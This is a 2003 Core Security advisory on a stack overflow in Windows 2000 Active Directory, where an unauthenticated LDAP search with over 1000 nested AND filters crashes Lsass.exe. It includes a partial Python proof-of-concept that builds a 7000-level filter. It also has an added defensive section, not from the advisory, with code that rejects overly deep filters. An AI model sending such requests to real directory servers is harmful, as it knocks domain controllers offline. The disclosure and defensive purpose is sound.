core.active.txt

Posted Jul 4, 2003
Authored by Eduardo Arias, Gabriel Becedillas, Ricardo Quesada, Damian Saura | Site coresecurity.com

Core Security Technologies Advisory ID: CORE-2003-0305-03 - The Microsoft Active Directory functionality is remotely and locally vulnerable to a stack overflow that allows an attacker to crash and force a reboot of any Windows 2000 server. Vulnerable package: Windows 2000 Server with Active Directory SP3. Fixed with Service Pack 4.

tags | exploit, overflow
systems | windows
SHA-256 | afedd8c7f809a694f9bb53497d9c62835d5aef2a503c9fd6108f9274b8cd15f5

                         Core Security Technologies Advisory
http://www.coresecurity.com

Active Directory Stack Overflow


Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-03

Bugtraq ID: 7930

CVE Name: None currently assigned.

Title: Active Directory Stack Overflow

Class: Boundary Error Condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10

Vendors contacted:
- Microsoft
. Core Notification: 2003-05-16
. Notification acknowledged by Microsoft: 2003-05-19
. Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

Active Directory, which is an essential component of the Windows 2000
architecture, presents organizations with a directory service designed
for distributed computing environments. Active Directory allows organizations
to centrally manage and share information on network resources and users
while acting as the central authority for network security.

The directory services provided by Active Directory are based on the
Lightweight Directory Access Protocol (LDAP) and thus Active Directory
objects can be stored and retrieved using the LDAP protocol.

A vulnerability in Active Directory allows an attacker to crash and force
a reboot of any Windows 2000 Server running the Active Directory service.

The vulnerability can be triggered when an LDAP version 3 search request
with more than 1000 "AND" statements is sent to the server, resulting in a
stack overflow and subsequent crash of the Lsass.exe service.

This, in turn, will force the domain controller to stop responding, thus
making a denial of service attack against it possible. The LDAP request
does not need to be authenticated.

The possibility of exploiting this vulnerability to execute arbitrary code
on a vulnerable server has not been proven, but it has not been ruled out.


*Vulnerable Packages:*

Windows 2000 Server with Active Directory (Service Pack 3).


*Solution/Vendor Information/Workaround:*

This issue is fixed in Windows 2000 Service Pack 4, which can be
downloaded from:
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

Further information about the vulnerability can be obtained from
http://support.microsoft.com/default.aspx?kbid=319709


*Credits:*

This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo
Quesada and Damian Saura from Core Security Technologies during Bugweek 2003
(March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

A 'search request' created using LDAP version 3, constructed with more than
1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash
and the machine reboot within 30 seconds.

To reproduce the stack overflow, you need to create a 'search request' to
an Active Directory server. The 'search request' must search for a non-existent
machine within the Domain Controller that you have previously bound to.

It must be composed of more than 1000 AND statements; it is presumed that
OR, GE, LE and other binary operators will yield the same results.

Example of a Python script that creates such a request:

------------------------------------
class ActiveDirectoryDOS( Ldap ):
    # Ldap and asn1 are helper modules from Core's own tooling; they are
    # not included in this advisory.

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)

    def generateFilter_BinaryOp( self, filter ):
        # filter is a (type, attribute, value) tuple: encode the
        # AttributeValueAssertion as two OCTET STRINGs under the filter tag
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # wrap the simple filter in numTimes nested AND filters
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest()
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'

        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

        # execute the anonymous query
        print('executing query')
        filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )
------------------------------------
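The vulnerability description (an unauthenticated LDAP v3 search request with more than 1000 nested ANDs) and the script above that builds such a request describe the attacker's side only. The following is an added example, not code from the advisory or from Core Security: an iterative check of the nesting depth of a BER-encoded LDAP Filter, of the kind a proxy, IDS rule or hardened LDAP front end could apply to reject such requests before they reach Lsass.exe. The filter tag values are the standard context tags from the LDAP v3 specification; the depth limit of 64, the function names and the sample filters built inline are assumptions for illustration.

```python
# Added example (not from the Core advisory or Core's tooling): an iterative,
# bounded-depth checker for the Filter of an LDAP v3 SearchRequest, the kind
# of check a proxy, IDS rule or hardened LDAP front end applies before a
# deeply nested AND/OR filter reaches the directory service.
#
# Context tags for the Filter CHOICE (RFC 2251 / RFC 4511):
LDAP_FILTER_AND = 0xA0       # [0] SET OF Filter, constructed
LDAP_FILTER_OR = 0xA1        # [1] SET OF Filter, constructed
LDAP_FILTER_NOT = 0xA2       # [2] Filter, constructed
LDAP_FILTER_EQUALITY = 0xA3  # [3] AttributeValueAssertion
OCTET_STRING = 0x04
CONSTRUCTED_FILTERS = (LDAP_FILTER_AND, LDAP_FILTER_OR, LDAP_FILTER_NOT)

# Assumed policy limit (not from the advisory): real queries rarely nest more
# than a handful of levels, while the crash needs more than 1000.
MAX_FILTER_DEPTH = 64


def ber_length(n):
    """Encode a BER length (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    """Wrap body in a BER tag/length header."""
    return bytes([tag]) + ber_length(len(body)) + body


def equality_filter(attribute, value):
    """Encode (attribute=value) as an LDAP equalityMatch filter."""
    ava = tlv(OCTET_STRING, attribute.encode()) + tlv(OCTET_STRING, value.encode())
    return tlv(LDAP_FILTER_EQUALITY, ava)


def nested_and(leaf, levels):
    """Constructed test input in the advisory's shape: `levels` nested ANDs.

    Built iteratively, so the generator itself is not limited by recursion.
    """
    buf = leaf
    for _ in range(levels):
        buf = tlv(LDAP_FILTER_AND, buf + leaf)
    return buf


def read_tlv(buf, pos):
    """Parse one BER header at pos; return (tag, value_start, value_end)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated BER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("element overruns buffer")
    return tag, pos, end


def filter_nesting_depth(filter_bytes, max_depth=MAX_FILTER_DEPTH):
    """Return the deepest AND/OR/NOT nesting found in a Filter.

    Walks the BER iteratively with an explicit stack of parent end offsets, so
    the checker itself cannot be driven into a stack overflow by the input it
    is meant to reject. Stops as soon as max_depth is exceeded.
    """
    stack = []           # end offsets of the constructed filters still open
    deepest = 0
    pos = 0
    while pos < len(filter_bytes):
        while stack and pos >= stack[-1]:   # leave filters that are complete
            stack.pop()
        tag, value_start, value_end = read_tlv(filter_bytes, pos)
        if stack and value_end > stack[-1]:
            raise ValueError("element overruns its parent filter")
        if tag in CONSTRUCTED_FILTERS:
            stack.append(value_end)
            deepest = max(deepest, len(stack))
            if deepest > max_depth:
                return deepest                  # enough to decide; stop early
            pos = value_start                   # descend into the children
        else:
            pos = value_end                     # leaf: skip its contents
    return deepest


def search_filter_allowed(filter_bytes, max_depth=MAX_FILTER_DEPTH):
    """Front-end policy decision: forward only well-formed, shallow filters."""
    try:
        return filter_nesting_depth(filter_bytes, max_depth) <= max_depth
    except ValueError:
        return False       # malformed BER is dropped, not forwarded


if __name__ == "__main__":
    leaf = equality_filter("name", "xaxax")          # constructed sample leaf
    for levels in (3, 1200):
        f = nested_and(leaf, levels)
        verdict = "allowed" if search_filter_allowed(f) else "rejected"
        print(levels, "levels,", len(f), "bytes ->", verdict)
```

The walk keeps its own stack instead of recursing, which matters here: a recursive descent parser would exhaust its own call stack on exactly the input it is meant to reject (CPython's default recursion limit is 1000 frames, close to the advisory's 1000-AND threshold), reproducing the class of failure the advisory describes inside the control. Rejecting malformed BER outright rather than forwarding it is deliberate for the same reason: a front end that passes along what it cannot parse protects nothing.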


*About Core Security Technologies*

Core Security Technologies develops strategic security solutions for
Fortune 1000 corporations, government agencies and military
organizations. The company offers information security software and
services designed to assess risk and protect and manage information
assets.
Headquartered in Boston, MA, Core Security Technologies can be reached
at 617-399-6980 or on the Web at http://www.coresecurity.com.

To learn more about CORE IMPACT, the first comprehensive penetration
testing framework, visit:
http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

The contents of this advisory are copyright (c) 2003 CORE Security
Technologies and may be distributed freely provided that no fee is
charged for this distribution and proper credit is given.

$Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $

